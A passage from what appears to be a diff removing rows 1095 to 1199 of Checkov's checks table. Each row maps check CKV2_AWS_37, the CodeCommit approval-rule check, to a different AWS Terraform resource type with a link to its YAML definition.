-| 1095 | CKV2_AWS_37 | resource | aws_ecs_capacity_provider | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1096 | CKV2_AWS_37 | resource | aws_ecs_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1097 | CKV2_AWS_37 | resource | aws_ecs_service | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1098 | CKV2_AWS_37 | resource | aws_ecs_task_definition | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1099 | CKV2_AWS_37 | resource | aws_efs_access_point | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1100 | CKV2_AWS_37 | resource | aws_efs_file_system | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1101 | CKV2_AWS_37 | resource | aws_efs_file_system_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1102 | CKV2_AWS_37 | resource | aws_efs_mount_target | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1103 | CKV2_AWS_37 | resource | aws_egress_only_internet_gateway | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1104 | CKV2_AWS_37 | resource | aws_eip | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1105 | CKV2_AWS_37 | resource | aws_eip_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1106 | CKV2_AWS_37 | resource | aws_eks_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1107 | CKV2_AWS_37 | resource | aws_eks_fargate_profile | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1108 | CKV2_AWS_37 | resource | aws_eks_node_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1109 | CKV2_AWS_37 | resource | aws_elastic_beanstalk_application | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1110 | CKV2_AWS_37 | resource | aws_elastic_beanstalk_application_version | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1111 | CKV2_AWS_37 | resource | aws_elastic_beanstalk_configuration_template | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1112 | CKV2_AWS_37 | resource | aws_elastic_beanstalk_environment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1113 | CKV2_AWS_37 | resource | aws_elasticache_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1114 | CKV2_AWS_37 | resource | aws_elasticache_parameter_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1115 | CKV2_AWS_37 | resource | aws_elasticache_replication_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1116 | CKV2_AWS_37 | resource | aws_elasticache_security_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1117 | CKV2_AWS_37 | resource | aws_elasticache_subnet_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1118 | CKV2_AWS_37 | resource | aws_elasticsearch_domain | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1119 | CKV2_AWS_37 | resource | aws_elasticsearch_domain_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1120 | CKV2_AWS_37 | resource | aws_elastictranscoder_pipeline | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1121 | CKV2_AWS_37 | resource | aws_elastictranscoder_preset | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1122 | CKV2_AWS_37 | resource | aws_elb | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1123 | CKV2_AWS_37 | resource | aws_elb_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1124 | CKV2_AWS_37 | resource | aws_emr_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1125 | CKV2_AWS_37 | resource | aws_emr_instance_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1126 | CKV2_AWS_37 | resource | aws_emr_security_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1127 | CKV2_AWS_37 | resource | aws_flow_log | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1128 | CKV2_AWS_37 | resource | aws_fms_admin_account | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1129 | CKV2_AWS_37 | resource | aws_fsx_lustre_file_system | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1130 | CKV2_AWS_37 | resource | aws_fsx_windows_file_system | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1131 | CKV2_AWS_37 | resource | aws_gamelift_alias | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1132 | CKV2_AWS_37 | resource | aws_gamelift_build | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1133 | CKV2_AWS_37 | resource | aws_gamelift_fleet | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1134 | CKV2_AWS_37 | resource | aws_gamelift_game_session_queue | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1135 | CKV2_AWS_37 | resource | aws_glacier_vault | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1136 | CKV2_AWS_37 | resource | aws_glacier_vault_lock | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1137 | CKV2_AWS_37 | resource | aws_globalaccelerator_accelerator | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1138 | CKV2_AWS_37 | resource | aws_globalaccelerator_endpoint_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1139 | CKV2_AWS_37 | resource | aws_globalaccelerator_listener | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1140 | CKV2_AWS_37 | resource | aws_glue_catalog_database | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1141 | CKV2_AWS_37 | resource | aws_glue_catalog_table | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1142 | CKV2_AWS_37 | resource | aws_glue_classifier | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1143 | CKV2_AWS_37 | resource | aws_glue_connection | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1144 | CKV2_AWS_37 | resource | aws_glue_crawler | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1145 | CKV2_AWS_37 | resource | aws_glue_job | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1146 
| CKV2_AWS_37 | resource | aws_glue_security_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1147 | CKV2_AWS_37 | resource | aws_glue_trigger | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1148 | CKV2_AWS_37 | resource | aws_glue_workflow | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1149 | CKV2_AWS_37 | resource | aws_guardduty_detector | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1150 | CKV2_AWS_37 | resource | aws_guardduty_invite_accepter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1151 | CKV2_AWS_37 | resource | aws_guardduty_ipset | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1152 | CKV2_AWS_37 | resource | aws_guardduty_member | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1153 | CKV2_AWS_37 | resource | aws_guardduty_organization_admin_account | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1154 | CKV2_AWS_37 | resource | aws_guardduty_organization_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1155 | CKV2_AWS_37 | resource | aws_guardduty_threatintelset | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1156 | CKV2_AWS_37 | resource | aws_iam_access_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1157 | CKV2_AWS_37 | resource | aws_iam_account_alias | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1158 | CKV2_AWS_37 | resource | aws_iam_account_password_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1159 | CKV2_AWS_37 | resource | 
aws_iam_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1160 | CKV2_AWS_37 | resource | aws_iam_group_membership | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1161 | CKV2_AWS_37 | resource | aws_iam_group_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1162 | CKV2_AWS_37 | resource | aws_iam_group_policy_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1163 | CKV2_AWS_37 | resource | aws_iam_instance_profile | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1164 | CKV2_AWS_37 | resource | aws_iam_openid_connect_provider | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1165 | CKV2_AWS_37 | resource | aws_iam_policy | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1166 | CKV2_AWS_37 | resource | aws_iam_policy_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1167 | CKV2_AWS_37 | resource | aws_iam_policy_document | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1168 | CKV2_AWS_37 | resource | aws_iam_role | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1169 | CKV2_AWS_37 | resource | aws_iam_role_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1170 | CKV2_AWS_37 | resource | aws_iam_role_policy_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1171 | CKV2_AWS_37 | resource | aws_iam_saml_provider | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1172 | CKV2_AWS_37 | resource | aws_iam_server_certificate | Ensure CodeCommit 
associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1173 | CKV2_AWS_37 | resource | aws_iam_service_linked_role | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1174 | CKV2_AWS_37 | resource | aws_iam_user | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1175 | CKV2_AWS_37 | resource | aws_iam_user_group_membership | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1176 | CKV2_AWS_37 | resource | aws_iam_user_login_profile | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1177 | CKV2_AWS_37 | resource | aws_iam_user_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1178 | CKV2_AWS_37 | resource | aws_iam_user_policy_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1179 | CKV2_AWS_37 | 
resource | aws_iam_user_ssh_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1180 | CKV2_AWS_37 | resource | aws_inspector_assessment_target | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1181 | CKV2_AWS_37 | resource | aws_inspector_assessment_template | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1182 | CKV2_AWS_37 | resource | aws_inspector_resource_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1183 | CKV2_AWS_37 | resource | aws_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1184 | CKV2_AWS_37 | resource | aws_internet_gateway | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1185 | CKV2_AWS_37 | resource | aws_iot_certificate | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1186 | CKV2_AWS_37 | resource | aws_iot_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1187 | CKV2_AWS_37 | resource | aws_iot_policy_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1188 | CKV2_AWS_37 | resource | aws_iot_role_alias | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1189 | CKV2_AWS_37 | resource | aws_iot_thing | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1190 | CKV2_AWS_37 | resource | aws_iot_thing_principal_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1191 | CKV2_AWS_37 | resource | aws_iot_thing_type | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1192 | CKV2_AWS_37 | resource | aws_iot_topic_rule | Ensure CodeCommit associates an 
approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1193 | CKV2_AWS_37 | resource | aws_key_pair | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1194 | CKV2_AWS_37 | resource | aws_kinesis_analytics_application | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1195 | CKV2_AWS_37 | resource | aws_kinesis_firehose_delivery_stream | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1196 | CKV2_AWS_37 | resource | aws_kinesis_stream | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1197 | CKV2_AWS_37 | resource | aws_kinesis_video_stream | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1198 | CKV2_AWS_37 | resource | aws_kms_alias | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1199 | CKV2_AWS_37 | resource | 
